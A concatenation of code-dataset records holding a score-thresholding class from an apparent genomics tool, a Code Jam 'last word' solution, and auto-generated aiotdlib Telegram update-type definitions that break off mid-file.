ax2.plot([neg_threshold, neg_threshold], [0.0, 1.0], color="red")
ax2.set_ylabel("Estimated foreground precision")
ax2.set_ylim(0.0, 1.02)
class FixedWindowAroundChunks(AbstractCoordProducer):
count = 0
def __init__(self, sliding,
flank,
suppress, #flanks to suppress
target_fdr,
min_passing_windows_frac,
max_passing_windows_frac,
separate_pos_neg_thresholds=False,
max_seqlets_total=None,
progress_update=5000,
verbose=True,
plot_save_dir="figures"):
self.sliding = sliding
self.flank = flank
self.suppress = suppress
self.target_fdr = target_fdr
assert max_passing_windows_frac >= min_passing_windows_frac
self.min_passing_windows_frac = min_passing_windows_frac
self.max_passing_windows_frac = max_passing_windows_frac
self.separate_pos_neg_thresholds = separate_pos_neg_thresholds
self.max_seqlets_total = None
self.progress_update = progress_update
self.verbose = verbose
self.plot_save_dir = plot_save_dir
@classmethod
def from_hdf5(cls, grp):
sliding = grp.attrs["sliding"]
flank = grp.attrs["flank"]
suppress = grp.attrs["suppress"]
target_fdr = grp.attrs["target_fdr"]
min_passing_windows_frac = grp.attrs["min_passing_windows_frac"]
max_passing_windows_frac = grp.attrs["max_passing_windows_frac"]
separate_pos_neg_thresholds = grp.attrs["separate_pos_neg_thresholds"]
if ("max_seqlets_total" in grp.attrs):
max_seqlets_total = grp.attrs["max_seqlets_total"]
else:
max_seqlets_total = None
progress_update = grp.attrs["progress_update"]
verbose = grp.attrs["verbose"]
return cls(sliding=sliding, flank=flank, suppress=suppress,
target_fdr=target_fdr,
min_passing_windows_frac=min_passing_windows_frac,
max_passing_windows_frac=max_passing_windows_frac,
separate_pos_neg_thresholds=separate_pos_neg_thresholds,
max_seqlets_total=max_seqlets_total,
progress_update=progress_update, verbose=verbose)
def save_hdf5(self, grp):
grp.attrs["class"] = type(self).__name__
grp.attrs["sliding"] = self.sliding
grp.attrs["flank"] = self.flank
grp.attrs["suppress"] = self.suppress
grp.attrs["target_fdr"] = self.target_fdr
grp.attrs["min_passing_windows_frac"] = self.min_passing_windows_frac
grp.attrs["max_passing_windows_frac"] = self.max_passing_windows_frac
grp.attrs["separate_pos_neg_thresholds"] =\
self.separate_pos_neg_thresholds
if (self.max_seqlets_total is not None):
grp.attrs["max_seqlets_total"] = self.max_seqlets_total
grp.attrs["progress_update"] = self.progress_update
grp.attrs["verbose"] = self.verbose
def __call__(self, score_track, null_track, tnt_results=None):
# score_track now can be a list of arrays,
assert all([len(x.shape)==1 for x in score_track])
window_sum_function = get_simple_window_sum_function(self.sliding)
if (self.verbose):
print("Computing windowed sums on original")
sys.stdout.flush()
original_summed_score_track = window_sum_function(arrs=score_track)
#Determine the window thresholds
if (tnt_results is None):
if (self.verbose):
print("Generating null dist")
sys.stdout.flush()
null_vals = get_null_vals(
null_track=null_track,
score_track=score_track,
window_size=self.sliding,
original_summed_score_track=original_summed_score_track)
if (self.verbose):
print("Computing threshold")
sys.stdout.flush()
orig_vals = list(
np.concatenate(original_summed_score_track, axis=0))
#Note that orig_vals may have been subsampled at this point
pos_ir, neg_ir, subsampled_orig_vals, subsampled_null_vals =\
get_isotonic_regression_classifier(
orig_vals=orig_vals,
null_vals=null_vals)
subsampled_pos_orig_vals = (
np.array(sorted([x for x in subsampled_orig_vals if x >= 0])))
subsampled_neg_orig_vals = (
np.array(sorted([x for x in subsampled_orig_vals if x < 0],
key=lambda x: abs(x))))
subsampled_pos_val_precisions =\
pos_ir.transform(subsampled_pos_orig_vals)
if (len(subsampled_neg_orig_vals) > 0):
subsampled_neg_val_precisions =\
neg_ir.transform(subsampled_neg_orig_vals)
pos_threshold = ([x[1] for x in
zip(subsampled_pos_val_precisions,
subsampled_pos_orig_vals) if x[0]
>= (1-self.target_fdr)]+[subsampled_pos_orig_vals[-1]])[0]
if (len(subsampled_neg_orig_vals) > 0):
neg_threshold = ([x[1] for x in
zip(subsampled_neg_val_precisions,
subsampled_neg_orig_vals) if x[0]
>= (1-self.target_fdr)]+[subsampled_neg_orig_vals[-1]])[0]
else:
neg_threshold = -np.inf
pos_threshold, neg_threshold =\
refine_thresholds_based_on_frac_passing(
vals=subsampled_orig_vals,
pos_threshold=pos_threshold,
neg_threshold=neg_threshold,
min_passing_windows_frac=self.min_passing_windows_frac,
max_passing_windows_frac=self.max_passing_windows_frac,
separate_pos_neg_thresholds=self.separate_pos_neg_thresholds,
verbose=self.verbose)
if (self.separate_pos_neg_thresholds):
val_transformer = SignedPercentileValTransformer(
distribution=orig_vals)
else:
val_transformer = AbsPercentileValTransformer(
distribution=orig_vals)
if (self.verbose):
print("Final raw thresholds are",
neg_threshold," and ",pos_threshold)
print("Final transformed thresholds are",
val_transformer(neg_threshold)," and ",
val_transformer(pos_threshold))
make_nulldist_figure(orig_vals=subsampled_orig_vals,
null_vals=subsampled_null_vals,
pos_ir=pos_ir, neg_ir=neg_ir,
pos_threshold=pos_threshold,
neg_threshold=neg_threshold)
util.show_or_savefig(plot_save_dir=self.plot_save_dir,
filename="scoredist_"
+str(FixedWindowAroundChunks.count)+".png")
FixedWindowAroundChunks.count += 1
tnt_results = FWACTransformAndThresholdResults(
neg_threshold=neg_threshold,
transformed_neg_threshold=val_transformer(neg_threshold),
pos_threshold=pos_threshold,
transformed_pos_threshold=val_transformer(pos_threshold),
val_transformer=val_transformer)
coords = identify_coords(
score_track=original_summed_score_track,
pos_threshold=tnt_results.pos_threshold,
neg_threshold=tnt_results.neg_threshold,
window_size=self.sliding,
flank=self.flank,
suppress=self.suppress,
max_seqlets_total=self.max_seqlets_total,
verbose=self.verbose)
return CoordProducerResults(
coords=coords,
tnt_results=tnt_results)
| 1.773438 | 2 |
Google Jam/2016/lastword.py | djphan/Prog-Problems | 0 | 17676 | import sys
def lastWord ( inputString ):
results = []
outputString = inputString[0]
for i in range(1, len(inputString)):
intermediateString = sorted([outputString + inputString[i], inputString[i] + outputString ])
outputString = intermediateString[1]
return outputString
numTests = input()
for i in range (0, int(numTests)):
print ("Case #" + str(i+1) +": " + str(lastWord(input())))
| 3.5625 | 4 |
aiotdlib/api/types/update.py | pylakey/pytdlib | 37 | 17677 | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .address import Address
from .authorization_state import AuthorizationState
from .background import Background
from .basic_group import BasicGroup
from .basic_group_full_info import BasicGroupFullInfo
from .call import Call
from .callback_query_payload import CallbackQueryPayload
from .chat import Chat
from .chat_action import ChatAction
from .chat_action_bar import ChatActionBar
from .chat_filter_info import ChatFilterInfo
from .chat_invite_link import ChatInviteLink
from .chat_join_request import ChatJoinRequest
from .chat_join_requests_info import ChatJoinRequestsInfo
from .chat_list import ChatList
from .chat_member import ChatMember
from .chat_nearby import ChatNearby
from .chat_notification_settings import ChatNotificationSettings
from .chat_permissions import ChatPermissions
from .chat_photo_info import ChatPhotoInfo
from .chat_position import ChatPosition
from .chat_theme import ChatTheme
from .chat_type import ChatType
from .connection_state import ConnectionState
from .draft_message import DraftMessage
from .file import File
from .group_call import GroupCall
from .group_call_participant import GroupCallParticipant
from .language_pack_string import LanguagePackString
from .location import Location
from .message import Message
from .message_content import MessageContent
from .message_interaction_info import MessageInteractionInfo
from .message_sender import MessageSender
from .notification import Notification
from .notification_group import NotificationGroup
from .notification_group_type import NotificationGroupType
from .notification_settings_scope import NotificationSettingsScope
from .option_value import OptionValue
from .order_info import OrderInfo
from .poll import Poll
from .reply_markup import ReplyMarkup
from .scope_notification_settings import ScopeNotificationSettings
from .secret_chat import SecretChat
from .sticker import Sticker
from .sticker_set import StickerSet
from .sticker_sets import StickerSets
from .suggested_action import SuggestedAction
from .supergroup import Supergroup
from .supergroup_full_info import SupergroupFullInfo
from .terms_of_service import TermsOfService
from .user import User
from .user_full_info import UserFullInfo
from .user_privacy_setting import UserPrivacySetting
from .user_privacy_setting_rules import UserPrivacySettingRules
from .user_status import UserStatus
from .video_chat import VideoChat
from ..base_object import BaseObject
class Update(BaseObject):
"""
Contains notifications about data changes
"""
ID: str = Field("update", alias="@type")
class UpdateActiveNotifications(Update):
"""
Contains active notifications that was shown on previous application launches. This update is sent only if the message database is used. In that case it comes once before any updateNotification and updateNotificationGroup update
:param groups: Lists of active notification groups
:type groups: :class:`list[NotificationGroup]`
"""
ID: str = Field("updateActiveNotifications", alias="@type")
groups: list[NotificationGroup]
@staticmethod
def read(q: dict) -> UpdateActiveNotifications:
return UpdateActiveNotifications.construct(**q)
class UpdateAnimatedEmojiMessageClicked(Update):
"""
Some animated emoji message was clicked and a big animated sticker must be played if the message is visible on the screen. chatActionWatchingAnimations with the text of the message needs to be sent if the sticker is played
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
:param sticker: The animated sticker to be played
:type sticker: :class:`Sticker`
"""
ID: str = Field("updateAnimatedEmojiMessageClicked", alias="@type")
chat_id: int
message_id: int
sticker: Sticker
@staticmethod
def read(q: dict) -> UpdateAnimatedEmojiMessageClicked:
return UpdateAnimatedEmojiMessageClicked.construct(**q)
class UpdateAnimationSearchParameters(Update):
"""
The parameters of animation search through GetOption("animation_search_bot_username") bot has changed
:param provider: Name of the animation search provider
:type provider: :class:`str`
:param emojis: The new list of emojis suggested for searching
:type emojis: :class:`list[str]`
"""
ID: str = Field("updateAnimationSearchParameters", alias="@type")
provider: str
emojis: list[str]
@staticmethod
def read(q: dict) -> UpdateAnimationSearchParameters:
return UpdateAnimationSearchParameters.construct(**q)
class UpdateAuthorizationState(Update):
"""
The user authorization state has changed
:param authorization_state: New authorization state
:type authorization_state: :class:`AuthorizationState`
"""
ID: str = Field("updateAuthorizationState", alias="@type")
authorization_state: AuthorizationState
@staticmethod
def read(q: dict) -> UpdateAuthorizationState:
return UpdateAuthorizationState.construct(**q)
class UpdateBasicGroup(Update):
"""
Some data of a basic group has changed. This update is guaranteed to come before the basic group identifier is returned to the application
:param basic_group: New data about the group
:type basic_group: :class:`BasicGroup`
"""
ID: str = Field("updateBasicGroup", alias="@type")
basic_group: BasicGroup
@staticmethod
def read(q: dict) -> UpdateBasicGroup:
return UpdateBasicGroup.construct(**q)
class UpdateBasicGroupFullInfo(Update):
"""
Some data in basicGroupFullInfo has been changed
:param basic_group_id: Identifier of a basic group
:type basic_group_id: :class:`int`
:param basic_group_full_info: New full information about the group
:type basic_group_full_info: :class:`BasicGroupFullInfo`
"""
ID: str = Field("updateBasicGroupFullInfo", alias="@type")
basic_group_id: int
basic_group_full_info: BasicGroupFullInfo
@staticmethod
def read(q: dict) -> UpdateBasicGroupFullInfo:
return UpdateBasicGroupFullInfo.construct(**q)
class UpdateCall(Update):
"""
New call was created or information about a call was updated
:param call: New data about a call
:type call: :class:`Call`
"""
ID: str = Field("updateCall", alias="@type")
call: Call
@staticmethod
def read(q: dict) -> UpdateCall:
return UpdateCall.construct(**q)
class UpdateChatAction(Update):
"""
A message sender activity in the chat has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_thread_id: If not 0, a message thread identifier in which the action was performed
:type message_thread_id: :class:`int`
:param sender_id: Identifier of a message sender performing the action
:type sender_id: :class:`MessageSender`
:param action: The action
:type action: :class:`ChatAction`
"""
ID: str = Field("updateChatAction", alias="@type")
chat_id: int
message_thread_id: int
sender_id: MessageSender
action: ChatAction
@staticmethod
def read(q: dict) -> UpdateChatAction:
return UpdateChatAction.construct(**q)
class UpdateChatActionBar(Update):
"""
The chat action bar was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param action_bar: The new value of the action bar; may be null, defaults to None
:type action_bar: :class:`ChatActionBar`, optional
"""
ID: str = Field("updateChatActionBar", alias="@type")
chat_id: int
action_bar: typing.Optional[ChatActionBar] = None
@staticmethod
def read(q: dict) -> UpdateChatActionBar:
return UpdateChatActionBar.construct(**q)
class UpdateChatDefaultDisableNotification(Update):
"""
The value of the default disable_notification parameter, used when a message is sent to the chat, was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param default_disable_notification: The new default_disable_notification value
:type default_disable_notification: :class:`bool`
"""
ID: str = Field("updateChatDefaultDisableNotification", alias="@type")
chat_id: int
default_disable_notification: bool
@staticmethod
def read(q: dict) -> UpdateChatDefaultDisableNotification:
return UpdateChatDefaultDisableNotification.construct(**q)
class UpdateChatDraftMessage(Update):
"""
A chat draft has changed. Be aware that the update may come in the currently opened chat but with old content of the draft. If the user has changed the content of the draft, this update mustn't be applied
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param draft_message: The new draft message; may be null, defaults to None
:type draft_message: :class:`DraftMessage`, optional
:param positions: The new chat positions in the chat lists
:type positions: :class:`list[ChatPosition]`
"""
ID: str = Field("updateChatDraftMessage", alias="@type")
chat_id: int
draft_message: typing.Optional[DraftMessage] = None
positions: list[ChatPosition]
@staticmethod
def read(q: dict) -> UpdateChatDraftMessage:
return UpdateChatDraftMessage.construct(**q)
class UpdateChatFilters(Update):
"""
The list of chat filters or a chat filter has changed
:param chat_filters: The new list of chat filters
:type chat_filters: :class:`list[ChatFilterInfo]`
"""
ID: str = Field("updateChatFilters", alias="@type")
chat_filters: list[ChatFilterInfo]
@staticmethod
def read(q: dict) -> UpdateChatFilters:
return UpdateChatFilters.construct(**q)
class UpdateChatHasProtectedContent(Update):
"""
A chat content was allowed or restricted for saving
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param has_protected_content: New value of has_protected_content
:type has_protected_content: :class:`bool`
"""
ID: str = Field("updateChatHasProtectedContent", alias="@type")
chat_id: int
has_protected_content: bool
@staticmethod
def read(q: dict) -> UpdateChatHasProtectedContent:
return UpdateChatHasProtectedContent.construct(**q)
class UpdateChatHasScheduledMessages(Update):
"""
A chat's has_scheduled_messages field has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param has_scheduled_messages: New value of has_scheduled_messages
:type has_scheduled_messages: :class:`bool`
"""
ID: str = Field("updateChatHasScheduledMessages", alias="@type")
chat_id: int
has_scheduled_messages: bool
@staticmethod
def read(q: dict) -> UpdateChatHasScheduledMessages:
return UpdateChatHasScheduledMessages.construct(**q)
class UpdateChatIsBlocked(Update):
"""
A chat was blocked or unblocked
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param is_blocked: New value of is_blocked
:type is_blocked: :class:`bool`
"""
ID: str = Field("updateChatIsBlocked", alias="@type")
chat_id: int
is_blocked: bool
@staticmethod
def read(q: dict) -> UpdateChatIsBlocked:
return UpdateChatIsBlocked.construct(**q)
class UpdateChatIsMarkedAsUnread(Update):
"""
A chat was marked as unread or was read
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param is_marked_as_unread: New value of is_marked_as_unread
:type is_marked_as_unread: :class:`bool`
"""
ID: str = Field("updateChatIsMarkedAsUnread", alias="@type")
chat_id: int
is_marked_as_unread: bool
@staticmethod
def read(q: dict) -> UpdateChatIsMarkedAsUnread:
return UpdateChatIsMarkedAsUnread.construct(**q)
class UpdateChatLastMessage(Update):
"""
The last message of a chat was changed. If last_message is null, then the last message in the chat became unknown. Some new unknown messages might be added to the chat in this case
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param last_message: The new last message in the chat; may be null, defaults to None
:type last_message: :class:`Message`, optional
:param positions: The new chat positions in the chat lists
:type positions: :class:`list[ChatPosition]`
"""
ID: str = Field("updateChatLastMessage", alias="@type")
chat_id: int
last_message: typing.Optional[Message] = None
positions: list[ChatPosition]
@staticmethod
def read(q: dict) -> UpdateChatLastMessage:
return UpdateChatLastMessage.construct(**q)
class UpdateChatMember(Update):
"""
User rights changed in a chat; for bots only
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param actor_user_id: Identifier of the user, changing the rights
:type actor_user_id: :class:`int`
:param date: Point in time (Unix timestamp) when the user rights was changed
:type date: :class:`int`
:param invite_link: If user has joined the chat using an invite link, the invite link; may be null, defaults to None
:type invite_link: :class:`ChatInviteLink`, optional
:param old_chat_member: Previous chat member
:type old_chat_member: :class:`ChatMember`
:param new_chat_member: New chat member
:type new_chat_member: :class:`ChatMember`
"""
ID: str = Field("updateChatMember", alias="@type")
chat_id: int
actor_user_id: int
date: int
invite_link: typing.Optional[ChatInviteLink] = None
old_chat_member: ChatMember
new_chat_member: ChatMember
@staticmethod
def read(q: dict) -> UpdateChatMember:
return UpdateChatMember.construct(**q)
class UpdateChatMessageSender(Update):
"""
The message sender that is selected to send messages in a chat has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_sender_id: New value of message_sender_id; may be null if the user can't change message sender, defaults to None
:type message_sender_id: :class:`MessageSender`, optional
"""
ID: str = Field("updateChatMessageSender", alias="@type")
chat_id: int
message_sender_id: typing.Optional[MessageSender] = None
@staticmethod
def read(q: dict) -> UpdateChatMessageSender:
return UpdateChatMessageSender.construct(**q)
class UpdateChatMessageTtl(Update):
"""
The message Time To Live setting for a chat was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_ttl: New value of message_ttl
:type message_ttl: :class:`int`
"""
ID: str = Field("updateChatMessageTtl", alias="@type")
chat_id: int
message_ttl: int
@staticmethod
def read(q: dict) -> UpdateChatMessageTtl:
return UpdateChatMessageTtl.construct(**q)
class UpdateChatNotificationSettings(Update):
"""
Notification settings for a chat were changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param notification_settings: The new notification settings
:type notification_settings: :class:`ChatNotificationSettings`
"""
ID: str = Field("updateChatNotificationSettings", alias="@type")
chat_id: int
notification_settings: ChatNotificationSettings
@staticmethod
def read(q: dict) -> UpdateChatNotificationSettings:
return UpdateChatNotificationSettings.construct(**q)
class UpdateChatOnlineMemberCount(Update):
"""
The number of online group members has changed. This update with non-zero count is sent only for currently opened chats. There is no guarantee that it will be sent just after the count has changed
:param chat_id: Identifier of the chat
:type chat_id: :class:`int`
:param online_member_count: New number of online members in the chat, or 0 if unknown
:type online_member_count: :class:`int`
"""
ID: str = Field("updateChatOnlineMemberCount", alias="@type")
chat_id: int
online_member_count: int
@staticmethod
def read(q: dict) -> UpdateChatOnlineMemberCount:
return UpdateChatOnlineMemberCount.construct(**q)
class UpdateChatPendingJoinRequests(Update):
"""
The chat pending join requests were changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param pending_join_requests: The new data about pending join requests; may be null, defaults to None
:type pending_join_requests: :class:`ChatJoinRequestsInfo`, optional
"""
ID: str = Field("updateChatPendingJoinRequests", alias="@type")
chat_id: int
pending_join_requests: typing.Optional[ChatJoinRequestsInfo] = None
@staticmethod
def read(q: dict) -> UpdateChatPendingJoinRequests:
return UpdateChatPendingJoinRequests.construct(**q)
class UpdateChatPermissions(Update):
"""
Chat permissions was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param permissions: The new chat permissions
:type permissions: :class:`ChatPermissions`
"""
ID: str = Field("updateChatPermissions", alias="@type")
chat_id: int
permissions: ChatPermissions
@staticmethod
def read(q: dict) -> UpdateChatPermissions:
return UpdateChatPermissions.construct(**q)
class UpdateChatPhoto(Update):
"""
A chat photo was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param photo: The new chat photo; may be null, defaults to None
:type photo: :class:`ChatPhotoInfo`, optional
"""
ID: str = Field("updateChatPhoto", alias="@type")
chat_id: int
photo: typing.Optional[ChatPhotoInfo] = None
@staticmethod
def read(q: dict) -> UpdateChatPhoto:
return UpdateChatPhoto.construct(**q)
class UpdateChatPosition(Update):
"""
The position of a chat in a chat list has changed. Instead of this update updateChatLastMessage or updateChatDraftMessage might be sent
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param position: New chat position. If new order is 0, then the chat needs to be removed from the list
:type position: :class:`ChatPosition`
"""
ID: str = Field("updateChatPosition", alias="@type")
chat_id: int
position: ChatPosition
@staticmethod
def read(q: dict) -> UpdateChatPosition:
return UpdateChatPosition.construct(**q)
class UpdateChatReadInbox(Update):
"""
Incoming messages were read or the number of unread messages has been changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param last_read_inbox_message_id: Identifier of the last read incoming message
:type last_read_inbox_message_id: :class:`int`
:param unread_count: The number of unread messages left in the chat
:type unread_count: :class:`int`
"""
ID: str = Field("updateChatReadInbox", alias="@type")
chat_id: int
last_read_inbox_message_id: int
unread_count: int
@staticmethod
def read(q: dict) -> UpdateChatReadInbox:
return UpdateChatReadInbox.construct(**q)
class UpdateChatReadOutbox(Update):
"""
Outgoing messages were read
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param last_read_outbox_message_id: Identifier of last read outgoing message
:type last_read_outbox_message_id: :class:`int`
"""
ID: str = Field("updateChatReadOutbox", alias="@type")
chat_id: int
last_read_outbox_message_id: int
@staticmethod
def read(q: dict) -> UpdateChatReadOutbox:
return UpdateChatReadOutbox.construct(**q)
class UpdateChatReplyMarkup(Update):
"""
The default chat reply markup was changed. Can occur because new messages with reply markup were received or because an old reply markup was hidden by the user
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param reply_markup_message_id: Identifier of the message from which reply markup needs to be used; 0 if there is no default custom reply markup in the chat
:type reply_markup_message_id: :class:`int`
"""
ID: str = Field("updateChatReplyMarkup", alias="@type")
chat_id: int
reply_markup_message_id: int
@staticmethod
def read(q: dict) -> UpdateChatReplyMarkup:
return UpdateChatReplyMarkup.construct(**q)
class UpdateChatTheme(Update):
"""
The chat theme was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param theme_name: The new name of the chat theme; may be empty if theme was reset to default
:type theme_name: :class:`str`
"""
ID: str = Field("updateChatTheme", alias="@type")
chat_id: int
theme_name: str
@staticmethod
def read(q: dict) -> UpdateChatTheme:
return UpdateChatTheme.construct(**q)
class UpdateChatThemes(Update):
"""
The list of available chat themes has changed
:param chat_themes: The new list of chat themes
:type chat_themes: :class:`list[ChatTheme]`
"""
ID: str = Field("updateChatThemes", alias="@type")
chat_themes: list[ChatTheme]
@staticmethod
def read(q: dict) -> UpdateChatThemes:
return UpdateChatThemes.construct(**q)
class UpdateChatTitle(Update):
"""
The title of a chat was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param title: The new chat title
:type title: :class:`str`
"""
ID: str = Field("updateChatTitle", alias="@type")
chat_id: int
title: str
@staticmethod
def read(q: dict) -> UpdateChatTitle:
return UpdateChatTitle.construct(**q)
class UpdateChatUnreadMentionCount(Update):
"""
The chat unread_mention_count has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param unread_mention_count: The number of unread mention messages left in the chat
:type unread_mention_count: :class:`int`
"""
ID: str = Field("updateChatUnreadMentionCount", alias="@type")
chat_id: int
unread_mention_count: int
@staticmethod
def read(q: dict) -> UpdateChatUnreadMentionCount:
return UpdateChatUnreadMentionCount.construct(**q)
class UpdateChatVideoChat(Update):
"""
A chat video chat state has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param video_chat: New value of video_chat
:type video_chat: :class:`VideoChat`
"""
ID: str = Field("updateChatVideoChat", alias="@type")
chat_id: int
video_chat: VideoChat
@staticmethod
def read(q: dict) -> UpdateChatVideoChat:
return UpdateChatVideoChat.construct(**q)
class UpdateConnectionState(Update):
"""
The connection state has changed. This update must be used only to show a human-readable description of the connection state
:param state: The new connection state
:type state: :class:`ConnectionState`
"""
ID: str = Field("updateConnectionState", alias="@type")
state: ConnectionState
@staticmethod
def read(q: dict) -> UpdateConnectionState:
return UpdateConnectionState.construct(**q)
class UpdateDeleteMessages(Update):
"""
Some messages were deleted
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_ids: Identifiers of the deleted messages
:type message_ids: :class:`list[int]`
:param is_permanent: True, if the messages are permanently deleted by a user (as opposed to just becoming inaccessible)
:type is_permanent: :class:`bool`
:param from_cache: True, if the messages are deleted only from the cache and can possibly be retrieved again in the future
:type from_cache: :class:`bool`
"""
ID: str = Field("updateDeleteMessages", alias="@type")
chat_id: int
message_ids: list[int]
is_permanent: bool
from_cache: bool
@staticmethod
def read(q: dict) -> UpdateDeleteMessages:
return UpdateDeleteMessages.construct(**q)
class UpdateDiceEmojis(Update):
"""
The list of supported dice emojis has changed
:param emojis: The new list of supported dice emojis
:type emojis: :class:`list[str]`
"""
ID: str = Field("updateDiceEmojis", alias="@type")
emojis: list[str]
@staticmethod
def read(q: dict) -> UpdateDiceEmojis:
return UpdateDiceEmojis.construct(**q)
class UpdateFavoriteStickers(Update):
"""
The list of favorite stickers was updated
:param sticker_ids: The new list of file identifiers of favorite stickers
:type sticker_ids: :class:`list[int]`
"""
ID: str = Field("updateFavoriteStickers", alias="@type")
sticker_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateFavoriteStickers:
return UpdateFavoriteStickers.construct(**q)
class UpdateFile(Update):
"""
Information about a file was updated
:param file: New data about the file
:type file: :class:`File`
"""
ID: str = Field("updateFile", alias="@type")
file: File
@staticmethod
def read(q: dict) -> UpdateFile:
return UpdateFile.construct(**q)
class UpdateFileGenerationStart(Update):
"""
The file generation process needs to be started by the application
:param generation_id: Unique identifier for the generation process
:type generation_id: :class:`int`
:param original_path: The path to a file from which a new file is generated; may be empty
:type original_path: :class:`str`
:param destination_path: The path to a file that must be created and where the new file is generated
:type destination_path: :class:`str`
:param conversion: String specifying the conversion applied to the original file. If conversion is "#url#" than original_path contains an HTTP/HTTPS URL of a file, which must be downloaded by the application
:type conversion: :class:`str`
"""
ID: str = Field("updateFileGenerationStart", alias="@type")
generation_id: int
original_path: str
destination_path: str
conversion: str
@staticmethod
def read(q: dict) -> UpdateFileGenerationStart:
return UpdateFileGenerationStart.construct(**q)
class UpdateFileGenerationStop(Update):
"""
File generation is no longer needed
:param generation_id: Unique identifier for the generation process
:type generation_id: :class:`int`
"""
ID: str = Field("updateFileGenerationStop", alias="@type")
generation_id: int
@staticmethod
def read(q: dict) -> UpdateFileGenerationStop:
return UpdateFileGenerationStop.construct(**q)
class UpdateGroupCall(Update):
"""
Information about a group call was updated
:param group_call: New data about a group call
:type group_call: :class:`GroupCall`
"""
ID: str = Field("updateGroupCall", alias="@type")
group_call: GroupCall
@staticmethod
def read(q: dict) -> UpdateGroupCall:
return UpdateGroupCall.construct(**q)
class UpdateGroupCallParticipant(Update):
"""
Information about a group call participant was changed. The updates are sent only after the group call is received through getGroupCall and only if the call is joined or being joined
:param group_call_id: Identifier of group call
:type group_call_id: :class:`int`
:param participant: New data about a participant
:type participant: :class:`GroupCallParticipant`
"""
ID: str = Field("updateGroupCallParticipant", alias="@type")
group_call_id: int
participant: GroupCallParticipant
@staticmethod
def read(q: dict) -> UpdateGroupCallParticipant:
return UpdateGroupCallParticipant.construct(**q)
class UpdateHavePendingNotifications(Update):
"""
Describes whether there are some pending notification updates. Can be used to prevent application from killing, while there are some pending notifications
:param have_delayed_notifications: True, if there are some delayed notification updates, which will be sent soon
:type have_delayed_notifications: :class:`bool`
:param have_unreceived_notifications: True, if there can be some yet unreceived notifications, which are being fetched from the server
:type have_unreceived_notifications: :class:`bool`
"""
ID: str = Field("updateHavePendingNotifications", alias="@type")
have_delayed_notifications: bool
have_unreceived_notifications: bool
@staticmethod
def read(q: dict) -> UpdateHavePendingNotifications:
return UpdateHavePendingNotifications.construct(**q)
class UpdateInstalledStickerSets(Update):
"""
The list of installed sticker sets was updated
:param is_masks: True, if the list of installed mask sticker sets was updated
:type is_masks: :class:`bool`
:param sticker_set_ids: The new list of installed ordinary sticker sets
:type sticker_set_ids: :class:`list[int]`
"""
ID: str = Field("updateInstalledStickerSets", alias="@type")
is_masks: bool
sticker_set_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateInstalledStickerSets:
return UpdateInstalledStickerSets.construct(**q)
class UpdateLanguagePackStrings(Update):
"""
Some language pack strings have been updated
:param localization_target: Localization target to which the language pack belongs
:type localization_target: :class:`str`
:param language_pack_id: Identifier of the updated language pack
:type language_pack_id: :class:`str`
:param strings: List of changed language pack strings
:type strings: :class:`list[LanguagePackString]`
"""
ID: str = Field("updateLanguagePackStrings", alias="@type")
localization_target: str
language_pack_id: str
strings: list[LanguagePackString]
@staticmethod
def read(q: dict) -> UpdateLanguagePackStrings:
return UpdateLanguagePackStrings.construct(**q)
class UpdateMessageContent(Update):
"""
The message content has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
:param new_content: New message content
:type new_content: :class:`MessageContent`
"""
ID: str = Field("updateMessageContent", alias="@type")
chat_id: int
message_id: int
new_content: MessageContent
@staticmethod
def read(q: dict) -> UpdateMessageContent:
return UpdateMessageContent.construct(**q)
class UpdateMessageContentOpened(Update):
"""
The message content was opened. Updates voice note messages to "listened", video note messages to "viewed" and starts the TTL timer for self-destructing messages
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
"""
ID: str = Field("updateMessageContentOpened", alias="@type")
chat_id: int
message_id: int
@staticmethod
def read(q: dict) -> UpdateMessageContentOpened:
return UpdateMessageContentOpened.construct(**q)
class UpdateMessageEdited(Update):
"""
A message was edited. Changes in the message content will come in a separate updateMessageContent
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
:param edit_date: Point in time (Unix timestamp) when the message was edited
:type edit_date: :class:`int`
:param reply_markup: New message reply markup; may be null, defaults to None
:type reply_markup: :class:`ReplyMarkup`, optional
"""
ID: str = Field("updateMessageEdited", alias="@type")
chat_id: int
message_id: int
edit_date: int
reply_markup: typing.Optional[ReplyMarkup] = None
@staticmethod
def read(q: dict) -> UpdateMessageEdited:
return UpdateMessageEdited.construct(**q)
class UpdateMessageInteractionInfo(Update):
"""
The information about interactions with a message has changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
:param interaction_info: New information about interactions with the message; may be null, defaults to None
